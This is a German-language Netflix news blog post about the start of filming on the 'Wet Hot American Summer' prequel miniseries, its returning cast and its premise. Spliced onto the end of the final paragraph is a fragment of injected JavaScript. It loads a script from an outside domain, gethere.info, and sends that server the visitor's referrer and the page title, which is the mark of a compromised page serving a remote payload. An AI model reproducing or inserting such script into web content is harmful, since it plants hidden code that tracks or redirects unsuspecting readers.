Neue Veröffentlichungen bei Netflix Deutschland
Netflix Neuigkeiten - Finden Sie neue Filme und Serien bei Netflix USA

Dreharbeiten zu Wet Hot American Summer haben begonnen

Datum: 16/01/2015 | Keine Kommentare

Netflix arbeitet an einer neuen Comedy-Satire mit dem Namen “Wet Hot American Summer”. Die Serie basiert auf dem gleichnamigen Kinofilm aus dem Jahr 2001. In den Kinos war der Film damals ein Flop, doch er hat seitdem einen gewissen Kultstatus bekommen. Das genaue Datum des Erscheinens auf Netflix ist noch nicht bekannt — sicher ist nur, dass es zunächst 8 Folgen geben wird und der Schauplatz wieder ein jüdisches Feriencamp für Teenager sein wird.

Das Spektakuläre an der neuen Miniserie ist, dass nahezu die gesamte Crew des Films von 2001 wieder dabei sein wird! Das heißt, die Schauspieler Janeane Garofalo, David Hyde Pierce, Paul Rudd, Amy Poehler, Elizabeth Banks und Bradley Cooper spielen auch in der neuen Serie mit, ebenso wie die damaligen Drehbuchautoren David Wain und Michael Showalter, die auch die neue Serie entwickelt haben.

Diese Tatsache sorgt auch für einen Teil des absurden Humors von “Wet Hot American Summer”. Denn anders, als man denken könnte, wird diese Serie kein Sequel, sondern ein Prequel sein, also zeitlich noch vor dem Kinofilm anzusetzen sein — und das, obwohl die Schauspieler schon zu Zeiten des Kinofilms 10 Jahre älter als ihre Rollen waren. Nun sind sie noch älter, spielen aber weiterhin Teenager! David Wain hatte diese Idee schon vor Jahren, nun konnte sie umgesetzt werden. Im Januar begannen die Dreharbeiten für die neue Netflix-Original-Serie.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;




Leave a Reply